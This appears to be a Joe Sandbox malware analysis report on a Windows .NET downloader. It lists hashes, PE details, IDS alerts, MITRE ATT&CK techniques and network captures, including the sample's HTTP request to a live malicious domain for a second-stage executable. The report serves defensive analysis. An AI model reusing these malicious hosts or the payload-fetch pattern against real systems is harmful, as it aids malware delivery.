	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	YDg44STseR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	KtPCqWWnqM.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	6BRa130JDj.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3

Process:	C:\Users\user\Desktop\AJ5zYYsisA.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.14477814728973
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	AJ5zYYsisA.exe
File size:	101'376 bytes
MD5:	d522a48e0db195310ffe6dabf14d3c32
SHA1:	83a4dfb28a5c9710ff812e7f568bf71316e33665
SHA256:	846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede
SHA512:	6c70b5014807a03448a1d8b8aec3a2dc95e8e6c72c3a1313674bce278e94a7cd935dfc8375ad0c7fe92d5eff12f46b1fb81e971aafc70b83582c82349b57a46b
SSDEEP:	384:SmsWV1SRxW+dwMDS3b7202OtaiqLhSp1Xtff9vwEG9/XwJwq6uJfq2GSLwqX9vwt:SdiAZdwPLLNT0a22GZ2GzmW19
TLSH:	5BA3B330B6578721C52B1E31C8AD755C0372AF85A923DA5FE88C33799BF23C74A91B52
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....r...............0..x..........n.... ........@.. ....................................`................................

File Icon


Icon Hash:	1a5ada12a98c3689

Static PE Info

General

Entrypoint:	0x40976e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xEF72C5EC [Sat Apr 20 06:06:36 2097 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa000	0x10e54	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x96d4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7774	0x7800	6edf62815fb84feb6652ef2deb7c7acc	False	0.35771484375	data	5.38635854985906	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xa000	0x10e54	0x11000	83d61dc8e888d40f171008f7643aa345	False	0.05658318014705882	data	2.6807684242744467	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0xc	0x200	3ee5eb55d2c84cad34ece42377c6f250	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xa130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	0.046891636105524666
RT_GROUP_ICON	0x1a958	0x14	data	1.15
RT_VERSION	0x1a96c	0x2fc	data	0.43586387434554974
RT_MANIFEST	0x1ac68	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T03:39:40.112285+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.5	49704	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:39:39.312129974 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.312175035 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:39.313581944 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.319575071 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.319588900 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:39.786020041 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:39.786112070 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.790076017 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.790082932 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:39.790395975 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:39.835922003 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.841017962 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:39.887329102 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:40.112359047 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:40.112570047 CET	443	49704	188.114.97.3	192.168.2.5
Jan 11, 2025 03:39:40.113570929 CET	49704	443	192.168.2.5	188.114.97.3
Jan 11, 2025 03:39:40.132467031 CET	49704	443	192.168.2.5	188.114.97.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 03:39:39.294600964 CET	63925	53	192.168.2.5	1.1.1.1
Jan 11, 2025 03:39:39.306674004 CET	53	63925	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 03:39:39.294600964 CET	192.168.2.5	1.1.1.1	0x768b	Standard query (0)	dddotx.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 03:39:39.306674004 CET	1.1.1.1	192.168.2.5	0x768b	No error (0)	dddotx.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:39:39.306674004 CET	1.1.1.1	192.168.2.5	0x768b	No error (0)	dddotx.shop		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 11, 2025 03:39:50.581609011 CET	1.1.1.1	192.168.2.5	0xc2ed	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 03:39:50.581609011 CET	1.1.1.1	192.168.2.5	0xc2ed	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dddotx.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.97.3	443	1268	C:\Users\user\Desktop\AJ5zYYsisA.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:39:39 UTC	70	OUT	GET /Bish2.exe HTTP/1.1 Host: dddotx.shop Connection: Keep-Alive
2025-01-11 02:39:40 UTC	823	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 02:39:40 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLRzVkZxkBwlscSIHoKu7G3bKcMDiKHppTREQI9MbpXXy9Q7zHLzffJtsaFhsKqGumd0MHiR5pBUwZtiM16DJMH0TbcJIvP7DZk9vYR%2F1jeztHl6CZSLmLBpqrg9og%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900189a24c707cff-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2092&min_rtt=2056&rtt_var=844&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=684&delivery_rate=1243611&cwnd=222&unsent_bytes=0&cid=8afedfee9c1450a5&ts=345&x=0"
2025-01-11 02:39:40 UTC	213	IN	Data Raw: 63 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 42 69 73 68 32 2e 65 78 65 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: cf<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /Bish2.exe was not found on this server.</p></body></html>
2025-01-11 02:39:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	21:39:37
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\AJ5zYYsisA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\AJ5zYYsisA.exe"
Imagebase:	0x870000
File size:	101'376 bytes
MD5 hash:	D522A48E0DB195310FFE6DABF14D3C32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Function 00FA0838 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f85c3198a07f1d54078f941279d435820a62c3c636c7ac208fcbfe20033b57f
Instruction ID: d5cbd507831bfa25e374ff370601693066aa1bb3c28cffd43113eca069abd439
Opcode Fuzzy Hash: 5f85c3198a07f1d54078f941279d435820a62c3c636c7ac208fcbfe20033b57f
Instruction Fuzzy Hash: 2C4159B5D05208DFCB04DFA9E8446EDBBB6BF8A311F20902AE805B7315DB745846EF44

Function 00FA0848 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdaf21b72ef1a1b56427a573e04d94436ff538e2ff405f5eb35301867805896c
Instruction ID: 85712c9e5b08c94402c6bdab70d28e7e317c2d226174661551a08bb5160fec31
Opcode Fuzzy Hash: bdaf21b72ef1a1b56427a573e04d94436ff538e2ff405f5eb35301867805896c
Instruction Fuzzy Hash: 2E4117B5D05218DFCB04DFA9E8446EDBBB6BF8A311F209029E809B7315DB746845EF44

Function 00FA0F79 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 411a742170204324c3b93c70b3de3e79676f8e03a1cc32643311001362bc362c
Instruction ID: 94301645dc845cef42eeba9fb1574cc3e2bbadad689091b3949a941c19720b0e
Opcode Fuzzy Hash: 411a742170204324c3b93c70b3de3e79676f8e03a1cc32643311001362bc362c
Instruction Fuzzy Hash: 4F214BB5D0924CCFCB14CFA5E884AEDBBF6BF8A310F24912AD815B7255DB705881EB50

Function 00FA0FAF Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f58bb3ac92bd1931e8f826bbee965f7b32b0b2fa879caae96d0f96e7fe535c12
Instruction ID: b00e3f70a156c6e977025346821480573b3418c2cd1115e703601e6405b35a4d
Opcode Fuzzy Hash: f58bb3ac92bd1931e8f826bbee965f7b32b0b2fa879caae96d0f96e7fe535c12
Instruction Fuzzy Hash: BB2108B5D45248CFCB14DFA4E994AEDBBB5BF4A304F209029D415B7251DB705881EB50

Function 00FA09E8 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f004f4b4f0ef974c51bd0fab6b56bface94fe4fdc2e765d152340cb5ade84886
Instruction ID: e681f02986022bd97176fd5ad94e21203865d82697d853ba78245c51c837b2da
Opcode Fuzzy Hash: f004f4b4f0ef974c51bd0fab6b56bface94fe4fdc2e765d152340cb5ade84886
Instruction Fuzzy Hash: DCF0F676C8D3048FC7008B70E8097F9B775AF8B301F14646DD50A635A2EFB81559FA41

Function 00FA0A98 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87a025ff6c7b64f2952081667c1ab6d0017fb32f32b829456c745b37e62b0a41
Instruction ID: 63a8ba2af4946919e18cd0598551f6adb76b5db3979f0c40a027bb5ec2266982
Opcode Fuzzy Hash: 87a025ff6c7b64f2952081667c1ab6d0017fb32f32b829456c745b37e62b0a41
Instruction Fuzzy Hash: 17E0C26084E3486FC742CBB4AC13FAC7B30AB42305F0401DED080631E1D6641D02D746

Function 00FA0AA8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2107677888.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fa0000_AJ5zYYsisA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d627e3e3ad03ed49cd99b5be4ee674f469156e308b67395bb2001637ffa8b28
Instruction ID: 8be1f103953937ca53aee42e60987aaaabcc29d4476f672fc6705cadf664c2ed
Opcode Fuzzy Hash: 0d627e3e3ad03ed49cd99b5be4ee674f469156e308b67395bb2001637ffa8b28
Instruction Fuzzy Hash: 79C0127084631CABC744DBA5E802F9DB768DB42315F4001A8A50423290DB752D50E695

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report AJ5zYYsisA.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJ5zYYsisA.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
AJ5zYYsisA.exe